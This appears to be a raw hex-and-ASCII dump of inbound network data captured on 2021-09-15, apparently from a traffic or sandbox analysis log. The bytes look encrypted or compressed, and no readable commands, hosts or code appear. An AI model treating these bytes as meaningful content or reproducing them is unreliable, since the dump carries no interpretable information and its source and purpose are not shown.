2021-09-15 05:14:39 UTC	0	IN	Data Raw: 68 68 d3 c4 11 32 cb 78 ab 72 c8 da f5 70 93 1a 83 68 38 89 77 20 41 71 14 c5 bb a0 ca 39 c6 47 64 ee ec 35 d6 cd 9b 3e 7a 18 40 ed 56 f3 cf cb 6a 73 24 02 3e 51 4c e4 0d 1f 99 23 05 0c ce fc 96 15 fc cc 1a 58 fd 3a 04 d8 46 68 cb 8f 21 a5 76 b5 c8 21 03 13 e0 64 a1 e0 d4 7c 5a 54 31 6e d3 60 cc f4 0b 72 a4 65 b5 e8 de 8f c4 73 36 69 0f 82 6e 49 53 36 8b 9d 05 6f d0 4b cf aa 06 d5 ca e1 50 bb ba f6 23 e5 e2 ec 48 92 7b ba 23 06 34 9a 7a 76 1d 36 ca 1d cd 6d c1 16 df 2a d4 fc 6b 67 9a 76 30 c9 c1 5e 16 6a 9b c9 53 4f 1d 4c 5e e7 69 30 e0 ad 46 64 6f a1 cf 08 d2 26 60 d7 75 f9 09 39 03 fd 04 aa a4 92 04 3f 64 b1 1e d0 22 86 b3 4f d7 48 ff d5 6f f7 c4 75 8c f9 b3 32 bd 41 14 fe c6 0a a3 72 86 7f 3d f6 e5 72 b1 44 8b bd da 05 10 01 c7 16 ed 29 97 18 a1 c4 a5 Data Ascii: hh2xrph8w Aq9Gd5>z@Vjs$>QL#X:Fh!v!d\|ZT1n`res6inIS6oKP#H{#4zv6m*kgv0^jSOL^i0Fdo&`u9?d"OHou2Ar=rD)
2021-09-15 05:14:39 UTC	8	IN	Data Raw: d7 0f 23 f9 72 99 e4 6e 38 24 68 de dc 8b e7 12 6b 81 96 19 0b 67 0d 05 50 70 ee cd d5 c6 05 1d 71 85 97 cc d2 95 b8 3e a1 f3 48 40 2e 05 dc 14 68 f8 e8 bb 31 50 9a 8d e5 6f c7 9d 9b 18 ec a4 84 82 18 d8 ff 00 7c fe 31 25 91 a1 58 05 f7 61 a2 c6 57 34 45 c5 19 e2 ab 98 3b e1 be 61 9b 3c e3 97 97 1d 33 e2 82 cd 1a ee f4 ce fe c2 6c fd be 69 cb 72 7c e9 18 43 a3 18 7a 9d af a3 64 84 87 44 bf a3 af e0 ce 02 05 b0 b9 ed e2 02 75 31 2d ce 43 14 85 2d 25 ab 79 71 fb 70 8b 66 39 c8 9c 7a f3 ec 2b 08 0a 11 05 f2 eb 0c 79 cf 82 1c 03 ca 91 b2 3c 88 56 1e ec 0c 27 88 8f 08 11 6e eb 7f 7f 5a f3 d4 a4 87 39 05 2f 48 ab a2 19 29 db aa e0 57 00 48 42 ba c9 48 99 90 49 bf 72 2e 79 80 18 17 a6 26 df 47 ba e1 99 44 4c 37 ff b4 59 75 0a d2 fe 8a 29 47 ff 65 00 96 89 a1 b0 Data Ascii: #rn8$hkgPpq>H@.h1Po\|1%XaW4E;a<3lir\|CzdDu1-C-%yqpf9z+y<V'nZ9/H)WHBHIr.y&GDL7Yu)Ge
2021-09-15 05:14:39 UTC	15	IN	Data Raw: 81 e7 60 1f fe a3 fc 30 52 6a 23 83 ff 0a d3 62 89 ab d5 b5 4a 89 53 7d 05 b9 a7 59 28 47 69 c0 75 29 aa 70 57 d4 06 f9 98 a4 29 5d 92 e7 c6 17 5d 53 ff bd ec fe d9 92 17 db f6 da 23 20 ff 21 7d 27 48 91 47 ef 3c 54 5f e2 bc 9e 96 ab a8 67 76 44 79 0a 0d 2b bd f6 d7 79 7b f8 60 48 b4 41 6a 36 13 c0 f1 2b 20 27 2f 74 14 35 a5 d9 da 5f a5 00 c3 86 04 d0 05 fa 32 f5 31 54 b7 20 5a 9a a1 9e 46 56 d8 ea ce 31 5a 22 cf be 6e d4 26 a4 1f 28 9e b2 7e f5 42 ef 96 d6 72 71 9e 41 d0 ed e9 cd c2 5d 10 da de 21 ce 5b 52 d9 4c 70 b2 c8 7f ab d1 e1 ee 31 e8 d4 66 30 67 2b 8c 01 ec 27 75 b2 7b b4 1d a1 04 1c e6 45 1b ba 5e 07 56 9a 30 1e d7 0f 23 f9 72 99 e4 79 10 35 68 de da 8a dd 12 6b ef b2 c7 07 43 3a 05 50 60 c6 f5 d4 c6 0f c3 71 a9 97 cd c2 e5 ba 3e a1 85 4a 4e 20 Data Ascii: `0Rj#bJS}Y(Giu)pW)]]S# !}'HG<T_gvDy+y{`HAj6+ '/t5_21T ZFV1Z"n&(~BrqA]![RLp1f0g+'u{E^V0#ry5hkC:P`q>JN
2021-09-15 05:14:39 UTC	23	IN	Data Raw: 1f 4d e9 1e 7f 95 b5 30 3c 12 f1 ff 06 04 c0 db 5c a7 0c 55 c4 b3 5f 7f 5f 2f 78 1b c0 37 72 c8 35 66 18 37 95 ef 14 bb e1 37 e1 49 b2 3c 35 d0 22 87 a0 5e 26 5c ec c6 75 e5 15 64 9d b7 a1 23 33 fe 3c e4 c7 0a a9 01 e0 08 3e fc f6 47 a0 51 9a ac b5 20 11 01 8d 05 fb 18 81 30 ba c7 a5 7e 1a 17 bf 96 c3 e0 0b e9 29 41 79 05 cd 68 17 ee 19 5c b1 33 87 ac 32 5d 9b 7d 60 a6 20 14 73 2d b3 60 68 30 d9 db c7 03 5c c8 43 a7 d1 e3 b8 eb 73 2d 0b 85 f4 49 f3 81 08 7e 35 2b a1 62 53 09 d8 a3 b7 59 86 ee 9e 96 2f 06 29 0f da 50 e0 5d fb f7 fd c7 88 5c f5 c4 1e 4a e7 6d fd 98 3e a2 1a dd 27 9a e8 cd f2 89 06 67 1b 7f ac 59 aa 9c dd 03 80 9b 29 00 be 24 0b 21 58 04 ca 9b ee 14 dd 78 f7 ce c3 a4 58 d9 e8 44 15 94 a0 42 33 30 16 db 74 23 7c 26 1a d6 06 fb 9c bf 3a 5a ef Data Ascii: M0<\U__/x7r5f77I<5"^&\ud#3<>GQ 0~)Ayh\32]}` s-`h0\Cs-I~5+bSY/)P]\Jm>'gY)$!XxXDB30t#\|&:Z
2021-09-15 05:14:39 UTC	31	IN	Data Raw: 0a ff c4 7f 50 d1 13 c7 87 3f 16 6a 6b a9 8a 00 31 90 a8 57 51 6f d6 13 ba c3 87 83 b4 46 16 72 24 51 b8 10 0a 52 f9 f3 28 cb 82 99 40 60 26 d0 b4 53 a1 3f 62 c9 8a 29 53 db 5d 08 8d 7d 7e 9c cf 0f 76 45 d6 09 ca 1f 2e 7b 8f f5 08 d1 90 c2 0d 65 3c 25 12 ac 69 c2 c1 e1 aa d4 91 ef b3 e1 96 dc b8 fd c6 c7 00 43 7b fa e9 87 1a a7 d7 87 7a 5d d7 4f 64 d2 e7 59 d1 34 7e bb 46 68 30 67 09 da cf b5 c2 3e 0a 1f e0 6c fd 1e d5 50 52 7c 9e 6e d3 66 c7 e9 07 72 ac 7f 4b e9 f2 88 ec dd 36 69 09 99 62 49 5b 2e 75 9c 29 63 f8 cb 4e aa 0c 55 a6 fe ea b1 a3 4e 2a 20 d5 aa 48 f2 b4 8c 7b 6e 55 f6 53 f8 6e 75 af 44 a9 38 b3 8a 41 bb bd b9 1f 5c c8 17 10 31 b7 30 36 51 f5 e9 06 28 7d 6f 33 8e 06 26 f7 a1 4b 64 41 a7 e7 3c d1 26 66 a9 44 bc 09 3d 67 7a 05 aa e9 08 85 5e 64 Data Ascii: P?jk1WQoFr$QR(@`&S?b)S]}~vE.{e<%iC{z]OdY4~Fh0g>lPR\|nfrK6ibI[.u)cNUN* H{nUSnuD8A\106Q(}o3&KdA<&fD=gz^d
2021-09-15 05:14:39 UTC	39	IN	Data Raw: 01 75 b2 71 3a 33 a1 04 90 ca 59 1c 89 40 2f ed 96 30 14 ff 9f 20 f9 74 b1 c0 79 10 00 42 70 db a3 d7 7d c4 86 b0 cd 18 55 12 be 50 7a cc dd 45 c5 0f c5 59 8b 97 cd c8 bd 97 3e a1 f9 64 52 27 1a ca 26 d3 f8 e9 aa 29 c2 99 90 e3 47 e3 82 9b 12 d5 1c ad ac 10 b7 56 29 46 f4 36 4c 07 7e 56 2a cc 5a 9a c7 5c 3e 6d ef 15 ca 10 47 3b c1 b3 68 b3 65 f3 97 91 0e 37 fd 98 eb af ee fa de d6 53 6e e6 88 42 ef d9 7c e3 30 ee a2 18 61 96 82 9c 63 f0 ea 6c 85 a2 c0 27 c4 04 27 d9 b6 d5 46 6d e8 31 3c c9 15 56 85 2d 2f fd d9 71 fb 70 b0 1a 2a cf b2 73 9f d1 2d 19 04 2d 51 62 e8 0a 10 47 0f 1b 09 14 9c 8e 1f 9c 7e b7 c4 34 2d e7 90 d6 11 1a ff 58 7f 50 d1 80 a0 96 39 3a 71 75 ab a8 3f 63 bb 86 e2 51 69 c7 44 92 4d 97 95 b2 11 30 73 24 5b 90 4c 17 ac fe cc 30 a4 e7 b1 03 Data Ascii: uq:3Y@/0 tyBp}UPzEY>dR'&)GV)F6L~VZ\>mG;he7SnB\|0acl''Fm1<V-/qps--QbG~4-XP9:qu?cQiDM0s$[L0
2021-09-15 05:14:39 UTC	47	IN	Data Raw: a2 10 cc 81 e9 cc cc 07 83 15 7d 1c 65 bd 44 c5 b9 dc 03 8a 88 37 1f f8 a9 20 21 40 04 d9 83 e1 01 c2 68 f3 d6 d5 b5 5a 57 5f 6d 14 a5 a3 48 62 29 3e c0 04 23 76 1f 3e 6e 06 fd be 9b 46 66 e9 cf cd 3f 81 3f 03 bb fb 9b c8 8b 06 d6 a0 f5 24 2b 26 26 13 da 48 4f 59 db 13 18 77 e3 b6 89 fd 53 a3 4f 44 9a 75 28 e7 22 bc fc ff 3f 47 f8 6a 9c 9c 47 66 13 3d e0 9e 16 2a 34 2b 50 24 5a 11 d2 04 55 af 23 d0 c9 86 c3 08 c0 f0 f5 31 99 a7 2e 4b 85 3b 8d 43 f7 e5 ea ce 37 72 fb cc be 68 c5 23 8e 3b 28 9e 7c 68 9a 7f d8 96 dc 61 8c b7 55 d1 e1 e3 dc c4 75 ca d9 de 25 a1 ee 53 62 47 04 a0 9d 7f b0 be e8 ed 31 e2 cb 6d 21 61 03 57 02 ec 23 1a 07 7a 12 16 d5 16 9a e6 5e 08 91 4d 01 7e 4a 33 1e d1 60 96 f8 72 93 90 6b 10 0a 71 cd d2 b1 d5 03 63 09 07 d0 dd 67 3c 05 50 51 Data Ascii: }eD7 !@hZW_mHb)>#v>nFf??$+&&HOYwSODu("?GjGf=*4+P$ZU#1.K;C7rh#;(\|haUu%SbG1m!aW#z^M~J3`rkqcg<PQ
2021-09-15 05:14:39 UTC	55	IN	Data Raw: 8d 59 2e 2e cb 58 06 69 4a a5 7e a4 28 b6 77 be 42 d5 bb 1d 47 fe 02 18 aa b2 5f 12 01 f5 ef 06 08 5f 68 1b 8a 0c 55 c8 cf 6d 6c 4b a7 de 00 fa 65 64 d7 23 d3 23 3b 4f fa 00 bb e7 4f 23 5f 64 bb c0 85 51 a4 b1 4f 31 5b f4 c5 6d de 98 77 8c a7 df 1a bf 49 12 ef cf 1b a4 1d ec 0b 3e f0 f4 5b a0 41 a3 bf db 05 16 6e a1 14 ed 0f 86 11 89 85 a1 74 34 2f 97 94 c5 ce 22 fa 20 28 0e 7c cd 62 c3 e8 2b 7d a6 3d 07 a6 21 17 28 c7 60 a6 35 08 d6 3e b3 60 63 fd c0 cd f9 1a 6d d7 53 8f b3 fe b8 e1 70 5e 2f 84 e6 43 e0 98 0f 66 24 30 e6 46 52 09 c7 b0 ab 48 8f f9 44 80 ea bb 06 0f ee 50 f3 40 6b e3 ec c4 8f 5c 24 ed 91 5c f6 7e d5 93 34 bb ee cd 17 e0 e4 e2 f0 83 13 57 10 76 b6 44 d4 b2 cb fd 8b a4 34 07 ed a2 20 30 53 1f 27 82 d3 43 e2 68 e2 d6 d5 38 6b 57 5f 6d 05 83 Data Ascii: Y..XiJ~(wBG__hUmlKed##;OO#_dQO1[mwI>[Ant4/" (\|b+}=!(`5>`cmSp^/Cf$0FRHDP@k\$\~4WvD4 0S'Ch8kW_m
2021-09-15 05:14:39 UTC	62	IN	Data Raw: 3a 54 a9 f0 17 07 9a 9a 1a 8f 48 ea c5 18 34 99 80 c7 15 7f 33 7e 7f 5a f3 44 a7 87 35 1f 5f 7c b8 a5 13 10 94 b7 eb af 6e fa 48 ab c7 81 43 ab 7a a0 7e 37 56 b8 09 10 b3 f1 21 38 99 f3 9f 49 0b 04 fe b4 59 c4 9b fa c9 80 05 92 c8 57 13 91 83 6e b7 d3 d9 c7 69 d0 19 c5 17 32 60 91 0b 18 fa 93 42 6d 49 35 09 4d b6 6a c4 cd 86 db d3 91 fa 9c d9 9c 22 b3 51 a9 cf 09 6f 45 f6 e9 85 01 46 dd b8 7f 45 ca 48 75 32 18 74 f4 12 2e da 46 6e 38 6a 32 a2 ce a4 cf 36 fd 12 cc 67 f9 f3 d3 7c 4b 53 2d 90 d2 4c c0 e5 0e 1d 6d 65 b5 e2 cd 89 d9 60 31 69 1e 85 74 b7 52 1a 8d 9f 16 6a cb 58 48 aa 17 d2 d2 00 eb 99 b9 55 39 2f c3 45 4e c1 bb 65 76 42 5f c2 5f 3e 65 a6 52 90 a4 2a fa 45 bb 44 f4 92 1f 47 77 13 10 aa c7 55 37 03 ff fa 11 11 48 03 c4 89 0d 5f b0 c7 4b 6e 4f 2f Data Ascii: :TH43~ZD5_\|nHCz~7V!8IYWni2`BmI5Mj"QoEFEHu2t.Fn8j26g\|KS-Lme`1itRjXHU9/ENevB__>eR*EDGwU7H_KnO/
2021-09-15 05:14:39 UTC	70	IN	Data Raw: c1 71 b2 97 6c a1 f9 43 e8 31 ee ab e1 31 67 21 9f 09 fd 2d 64 b4 14 aa 1d a1 0e f5 6c 44 1b 9c 4b 68 dd 97 30 14 b8 83 22 f9 78 8a e3 0a 32 08 6a d8 c9 aa cc 1b 7a 8d df e3 05 4f 3c 14 59 6b c1 9a f3 c4 0f c5 60 a6 bf 7e c6 95 be 51 8b f1 48 48 31 0c f8 59 6a f8 ef cf 29 50 9a 96 e3 7e ce ed 83 19 fd b8 72 b9 3f f0 ce 28 46 f4 22 2f c4 c5 56 20 d5 5d 8a fe 5d 3e 67 23 1b e4 8b 41 11 cb be 60 8b 3d f3 97 97 2d 33 03 93 c2 01 f4 fa d4 ff d9 5d e2 8e 44 cb d9 7c c9 18 63 b2 30 fc 85 87 87 64 ac e8 6d 85 a9 bb f1 ec 91 2c ca b1 82 fd 6c e8 3b 27 1a 68 bc b2 2d 25 df 6d 5f f9 7a a5 17 13 f0 9a 6d 96 0f 2b 0e 2a 39 79 f1 fb 0a 16 51 82 1c 09 0e 87 9a 19 92 56 14 c5 2f 17 8c 85 f5 11 10 d7 5f 7f 50 ca bb 31 87 3f 18 42 61 bd 8a 86 00 93 a2 8f 48 6e d6 48 b0 1d Data Ascii: qlC11g!-dlDKh0"x2jzO<Yk`~QHH1Yj)P~r?(F"/V ...g#A`=-3]D\|c0dm,l;'h-%m_zm+*9yQV/_P1?BaHnH
2021-09-15 05:14:39 UTC	78	IN	Data Raw: cd 8b ee 1f 8e 31 cc 2a 99 4f 2f dd 1c 43 a9 1d 8a 36 a3 b3 17 d9 ed fa cb dd f5 92 1d 52 8d 74 b8 52 ed 86 dd 03 80 a2 37 1f fe ba 10 23 58 2f d9 83 ff 05 c2 68 f7 c0 de 9e 5b 57 58 7b f1 94 8c 4a 3a 23 3e c7 63 dd 77 22 4f c3 0d fd b3 89 c6 5b c5 cd ec 15 72 df 00 aa 86 ab e2 e1 f8 dd a7 f2 22 33 cb 3d 12 aa 48 91 4d 4a 3b 2f 66 f5 af 9e d2 11 a8 76 78 82 8b 23 16 25 b9 e2 01 43 7f ee 94 97 d4 b3 56 0a 28 f3 f1 3a 2e 2d df 5d 00 33 b3 b9 2e 45 b1 2e c3 d6 94 c7 fb f9 1e f6 29 8a b2 20 4b 8c b7 60 47 a5 da fd dd 39 5a 33 cb a4 90 d5 0a a4 34 2a b5 cc 69 9f 49 ce 92 c1 a8 87 93 6a c4 e6 f7 af c0 26 d6 da de 27 cd 53 84 f3 23 10 b9 95 68 7d dd f9 e5 00 00 df 4c 23 57 2d 8c 70 e0 25 75 07 7b 12 0d b7 17 95 de 26 17 96 5c 07 47 99 2f 2d 29 0e 0f d8 70 e2 2c Data Ascii: 1O/C6RtR7#X/h[WX{J:#>cw"O[r"3=HMJ;/fvx#%CV(:.-]3.E.) K`G9Z34iIj&'S#h}L#W-p%u{&\G/-)p,
2021-09-15 05:14:39 UTC	86	IN	Data Raw: c1 4c 63 a1 2e fb c6 fe ec c6 e3 40 2a 22 b9 45 42 c8 48 98 64 66 4c e1 76 11 47 77 af 6f aa 11 ea f9 c2 44 ba 92 37 59 f9 13 1a c8 ed 32 36 09 8f 37 19 12 42 92 25 c5 0d 55 cc cf 1c 6e 4b ab 13 01 fa 4a 60 d7 23 9a 18 3d 67 a6 05 aa e5 28 2d 76 0c b1 1e d6 04 97 b6 65 37 49 ed d4 64 f4 cf 45 8c 1d 5c 32 b3 49 14 fe c6 19 93 76 c8 98 3e f6 e5 14 b1 44 9a ab d7 3d 6d 01 87 16 ed 00 8b e6 a0 ea ad 7c 2a 47 a1 07 59 d5 28 eb 20 5a e8 7c e1 60 15 e4 09 48 00 a1 19 a1 32 14 40 83 61 8a 37 0c e9 01 a8 f1 f5 3f cf ca da 08 b9 d6 7f 87 fa f4 bf fb e1 c2 34 89 f4 4a f7 66 18 4b 26 28 c3 47 5b 11 2c b1 87 47 97 fa 3a ae f9 8b 06 60 46 50 f3 46 e1 fa e1 d5 90 56 d1 d4 2f 55 ec f3 fe 82 3f a3 1c d6 36 e9 c5 da 0c 82 39 7f 1d 68 bd 4d db 47 dd 2f 88 a3 32 27 80 56 df Data Ascii: Lc.@"EBHdfLvGwoD7Y267B%UnKJ`#=g(-ve7IdE\2Iv>D=m\|GY( Z\|`H2@a7?4JfK&(G[,G:`FPFV/U?69hMG/2'V
2021-09-15 05:14:39 UTC	94	IN	Data Raw: 7a 05 7b 8f 08 3c ca e1 63 9d d1 2f 67 86 3b 79 fa e2 d0 ae 86 89 03 05 07 98 9a 1a 8d 4a ea c5 18 3a 8a fe d8 10 10 d3 7d 04 40 da 93 a2 91 3d 69 50 74 ab a6 9d b6 fc 01 e0 51 65 cb 51 bf c3 87 90 ae 80 be 5e 27 46 ab 1d 17 bd fd c0 2e 4b e0 b5 42 4f 0b c7 5d ae 54 f9 d0 da ba 2c 4d d2 5f 00 96 5b 7f b0 d9 25 bd 55 d7 0f d2 3e 25 5b 57 0f 09 fb f8 3f 6e 65 36 5b 49 cd 68 c2 cd 93 de de a9 3e 9a c6 96 de c9 6d a4 c7 04 41 49 e1 e8 8f 07 4a c6 ba 68 2b fb 1f 27 cd 1b 32 bd fd 01 d8 46 6a 4f 60 20 a5 ca b3 d6 f7 2b 98 e2 64 eb c0 d4 74 5a 54 6e 78 2d 61 da 0a 0a 61 a3 67 ce f8 df 8f c0 75 29 63 d9 aa e5 4b 53 3c 98 90 07 14 c0 4a 4f ae 00 ca c8 28 c2 a2 bb 42 20 3b cd 56 32 ce b7 9b 73 68 42 f9 8c 2e 78 58 ad 65 bf 05 e3 0e ae 45 ba 97 19 58 ec c5 38 ac b5 Data Ascii: z{<c/g;yJ:}@=iPtQeQ^'F.KBO]T,M_[%U>%[W?ne6[Ih>mAIJh+'2FjO` +dtZTnx-aagu)cKS<JO(B ;V2shB.xXeEX8
2021-09-15 05:14:39 UTC	101	IN	Data Raw: d4 09 a2 9e 41 d4 e7 86 9b c3 5d 1a d6 c1 2f dd 5f 52 73 49 6b 4c 9c 53 83 d3 8a c4 30 e8 dc 4e 6e 66 2b 86 29 0d 21 75 b4 53 a2 1e a1 0e b2 c2 45 1b 9c 33 9f 56 96 3a 71 82 0e 23 f3 54 85 f7 7d 10 1b 6e c1 d5 5d dc 3e 64 85 cb ef 06 4f 3e 6a ae 7a c6 ff ca d6 1c c7 71 be 93 d5 3c 94 94 26 89 2d 4a 4e 26 2d 87 0f 68 f2 c9 fb 22 52 9a e3 87 6d c7 88 90 01 ee b6 ac bd 1e c2 07 29 6a ea 33 58 9f 7e 56 24 d8 22 49 c6 5d 3f 02 4c 1b e2 ab 5d 28 cf be 70 9f 22 fe 69 96 31 27 eb aa 20 10 ee fc bb 63 c2 6d ec b4 9b cb d9 7c f6 16 70 a7 18 7a 81 9e 73 67 a8 90 6e 9d b4 b3 95 b1 06 2d c0 c6 c5 e5 6d ec 2b 3e c0 7a 85 81 32 29 2b 44 5d e9 52 fd 1c 3b c2 9c 7b 94 be 3e 09 00 33 74 ef e6 19 12 51 93 18 15 ea 9c b6 05 a8 56 10 c4 34 aa a3 85 d6 10 1a ca 6c 7b 50 ca 97 Data Ascii: A]/_RsIkLS0Nnf+)!uSE3V:q#T}n]>dO>jzq<&-JN&-h"Rm)j3X~V$"I]?L](p"i1' cm\|pzsgn-m+>z2)+D]R;{>3tQV4l{P
2021-09-15 05:14:39 UTC	109	IN	Data Raw: 61 4b e5 cc 47 58 66 04 b2 ab 42 b3 fb 3f c0 f8 8b 06 60 0d 53 f3 4a f9 ed c7 c2 8b 41 07 0d 01 5c fc 6d d3 8a 2e a4 7f d9 3b e9 c6 a3 9d 81 15 77 2c 77 b3 6c 1c bb dc 09 a7 68 e9 11 ec a7 de 37 74 05 d9 98 90 57 c2 68 ec 0a d7 ce 7f 56 5f 68 83 d4 a0 48 20 37 0e 4c 34 23 76 0c 22 0e 04 fd be bd 34 52 c1 d4 c2 17 5f 53 ce bd ec fe d3 83 69 0e 8d f2 28 0a fa 29 12 da 4a 91 00 ff 0a 51 76 ed bc 9a f9 55 bb 57 7f 9a 00 22 3a 2b bd fc ff 41 79 d0 7d 96 b4 95 67 04 46 b3 f0 2b 2e 36 37 21 6a 34 a5 d7 06 49 df 6d c2 c7 94 d2 06 85 7a f4 31 9d b4 5b 12 89 a1 9a 42 e6 02 e8 ce 37 58 27 b2 f7 6f d4 22 a4 11 2c e3 3c 7e f5 46 da 94 ad 3a 8b 9f 45 bf dd e8 cd c8 31 33 da de 23 ce 5b 52 42 0d 2b 9a 0c 7f ab db 46 91 72 e9 d8 62 32 65 50 cf 00 ec 21 62 68 6c c4 91 8a Data Ascii: aKGXfB?`SJA\m.;w,wlh7tWhV_hH 7L4#v"4R_Si()JQvUW":+Ay}gF+.67!j4Imz1[B7X'o",<~F:E13#[RB+Frb2eP!bhl
2021-09-15 05:14:39 UTC	117	IN	Data Raw: 67 b5 e2 b1 73 c5 73 30 7e 60 50 6c 49 59 59 75 9c 05 69 c3 44 5e a7 69 29 c5 fe ec a3 d5 90 28 28 c9 3b b5 df b6 9d 6f 01 8f eb 5a 0c 00 a7 ac 6f aa 13 ef 64 b0 3a f6 92 1f 43 e9 1c 38 a7 b6 30 30 10 fe 9a 35 02 4e 6a 20 98 1c 45 c6 cf 63 6c 4b a7 de 18 c3 2a 48 fa 20 bc 0f 11 61 fe 07 ac c7 cc 39 5e 6e de 3a d2 22 80 a2 5f 26 43 d5 f9 61 f6 c9 5d a2 a3 b0 34 95 a5 16 fe cc 65 85 70 c8 0f 2f e6 e6 3d 9b 46 8b bb dc 14 00 6e 9f 17 ed 03 49 17 84 ee 92 74 32 4a ae 82 ed f0 25 eb 23 99 16 6c c7 7f cb ee 04 44 9b 2c 10 92 47 e3 a4 82 71 b3 28 d2 ed 13 a2 75 78 35 4c 7d ec f9 ba 28 ac 89 d8 e2 f9 d5 70 5e 2f 84 f4 43 b3 98 19 67 2f 30 ce 47 0c 09 d2 b0 b9 48 95 f9 5e 81 f9 8a 02 0f da 51 6e 40 ea e3 81 d4 99 4f 25 d7 03 5c f9 7e d5 82 25 a2 10 cd 20 d9 c5 cc Data Ascii: gss0~`PlIYYuiD^i)((;oZod:C8005Nj EclK*H a9^n:"_&Ca]4ep/=FnIt2J%#lD,Gq(ux5L}(p^/Cg/0GH^Qn@O%\~%
2021-09-15 05:14:39 UTC	125	IN	Data Raw: ee 82 53 53 ba ed e0 4d 54 31 2d c4 e0 b1 a8 3f 03 f5 f9 71 fb 7a 83 ff 33 c8 9a 72 91 f9 06 0a 00 3f 53 76 95 93 17 51 86 3c b4 14 9d 9a 91 ad 7b 06 e2 14 9a 88 85 d6 31 ff df 7f 7f 4f c0 bb 8b 85 3f 14 6a f7 d5 3b 12 01 97 88 5e 51 6f d6 d8 9f ee 87 b3 98 c0 bf 72 24 71 b2 11 17 ac e2 f7 14 b7 e1 9f 6a e2 70 66 b5 53 af 26 45 c9 8a 29 d7 f2 70 12 b0 a3 c0 b0 c8 27 e6 4b df 0f d6 0c 0f 5b bb 09 09 fb a1 3a 12 fc 3d 21 3e 92 aa c2 c7 9f 52 f1 bc f9 bd e6 56 dc b2 7d 85 e8 09 47 61 e9 e6 a7 20 5b d6 ad 52 c7 a5 d6 6d cc 1d 78 3c 3a 00 d8 dc 4d 19 61 07 85 0f b5 c8 21 23 2d e9 64 e1 fb fc 51 58 54 37 44 55 1e 55 f5 0b 76 84 a7 b5 e8 de 15 e1 5e 24 4f 2f 40 6e 49 53 16 c8 94 05 6f cf 68 67 87 04 d5 c2 d4 68 cb 23 43 2a 2c e3 97 49 de b6 01 52 43 4c cf 7a c5 Data Ascii: SSMT1-?qz3r?SvQ<{1O?j;^Qor$qjpfS&E)p'K[:=!>RV}Ga [Rmx<:Ma!#-dQXT7DUUv^$O/@nISohgh#C*,IRCLz
2021-09-15 05:14:39 UTC	133	IN	Data Raw: ce 1d 99 3a cf be 70 fc 0b a4 1f 2e b4 f0 01 6c 43 d8 92 f6 d8 8b 9f 41 4a c4 c4 df e4 7d ba db de 23 ee 90 4a 62 4d 6f ae b5 52 a9 d1 f7 c6 b7 96 41 67 30 63 0b 27 00 ec 25 ef 97 56 00 3a 81 af 9b e6 45 3b 71 44 07 56 89 2d 36 fa 0d 23 ff 58 1b 9a e0 11 0a 6e fe 76 a2 dd 12 f1 a2 9d d6 21 6f 96 04 50 7a e6 f1 cc c6 0f dd 59 82 95 cd c4 bf 3e 40 38 f2 48 4a 00 a8 d1 0e 68 62 cc 8d 13 74 ba 3d e4 6f c7 a2 97 01 fd b2 b3 a5 32 f5 fb 28 40 d4 b3 5d 2e 7e 56 24 ff f8 a3 c6 5d a4 48 d0 08 c4 81 e8 3a cb be 41 8e 24 f3 97 8a 35 1e e0 82 c5 3e 6c 84 4d ff c2 69 c6 21 6b cb d9 e6 cc 35 72 85 38 c4 84 87 8d 46 98 98 6c 85 bd 87 cb c6 04 2b e0 3d 93 7d 6c e8 35 0d 74 7b 94 85 b7 00 f8 57 57 db ca a2 1d 3b e8 be 74 9c d1 34 03 28 14 7b f0 ed 20 90 2f 1b 1d 09 10 bd Data Ascii: :p.lCAJ}#JbMoRAg0c'%V:E;qDV-6#Xnv!oPzY>@8HJhbt=o2(@].~V$]H:A$5>lMi!k5r8Fl+=}l5t{WW;t4({ /
2021-09-15 05:14:39 UTC	140	IN	Data Raw: 4a 13 47 d3 73 17 f0 e2 b8 7b 55 73 3e a2 d4 db e2 98 19 47 f3 16 ce 47 4a 21 ff b2 ab 4e bf 7b 3a 18 f8 8b 06 2f 43 53 f3 40 70 c6 c1 c4 bf 6f b6 d7 03 5c d6 a7 f3 82 3f b5 38 e1 39 e9 ca e6 70 fd 8c 7c 0a 61 9d de c7 b9 dc 99 af a5 26 39 de 33 22 21 58 25 03 a5 ff 00 da 40 cb d4 d5 b3 6a d5 21 f5 0e 95 a4 68 b9 2a 3e c0 ef 06 5b 1f 6b f4 9d ff b4 91 18 86 cf cf c7 0b 71 11 01 bd ea de 77 f5 9f dd 8d f6 02 bc f9 39 12 40 6d bc 5c d8 1b b3 75 e3 bc ba 1b 73 a8 67 6b b2 58 20 3a 2d 97 7e 81 d8 7a f8 6e b6 29 9d 65 13 a1 d2 dc 3a 0c 14 bc 5e 2c 35 85 30 22 5f a2 34 eb ea 92 d0 03 d2 b0 8b a8 98 b6 24 7a 16 a3 9e 46 13 fc c7 df 1b 7a bc cd be 6e f4 cd 80 1f 28 89 5e 52 f7 42 de bc 54 0c 13 9e 41 d4 c1 76 cf c2 5d 8a ff f3 32 e8 7b cd 60 4d 70 92 71 59 ab d1 Data Ascii: JGs{Us>GGJ!N{:/CS@po\?89p\|a&93"!X%@j!h*>[kqw9@m\usgkX :-~zn)e:^,50"_4$zFzn(^RBTAv]2{`MpqY
2021-09-15 05:14:39 UTC	148	IN	Data Raw: a8 a6 4d d7 40 44 2a cc e2 f2 89 69 9c 29 91 bb 1f 7e eb 28 e3 a6 9b c8 91 2e 2e 10 5b d4 23 12 02 7e 9b eb 5f 2c 91 12 0b f7 47 b6 a0 98 d9 9b d3 21 55 47 ed 30 29 ac d0 a4 52 1a 27 9c 26 25 52 3e 80 00 9d 1d fa 6e a3 2b 9e 84 37 40 ff 09 1a b9 ad 7f 11 0a e7 ff 1f 17 42 62 21 9f 1a 11 91 ba 59 6e 55 fc da 1f d1 33 2e bd 00 95 2d 12 3d 92 31 d8 d1 42 41 38 45 9c 37 ef 17 bf 87 74 55 36 db b7 4a 84 93 29 98 9a 8b ec 73 8f c9 7d 3d df 7e b5 51 89 e4 62 3f fb 1e f3 3a 28 4e b6 a5 fe 55 cb 35 d0 43 dd 59 02 75 8c d8 8b 5c 6a 25 29 cd 35 ed a8 f8 9c 26 89 c4 24 fd bf 67 ce fd 6c fa fc ad 9f d1 74 c9 e4 0a b0 6b be b0 8e 45 54 51 9d c1 6b f1 01 67 69 30 7e d7 f3 a5 1f 79 9f 59 0b 9e f6 8c a7 57 d7 c2 bb 4a 2a 35 e7 28 50 a9 0a 48 24 ad 8b 6f f4 40 ff 11 79 47 Data Ascii: M@Di)~(..[#~_,G!UG0)R'&%R>n+7@Bb!YnU3.-=1BA8E7tU6J)s}=~Qb?:(NU5CYu\j%)5&$gltkETQkgi0~yYWJ5(PH$o@yG
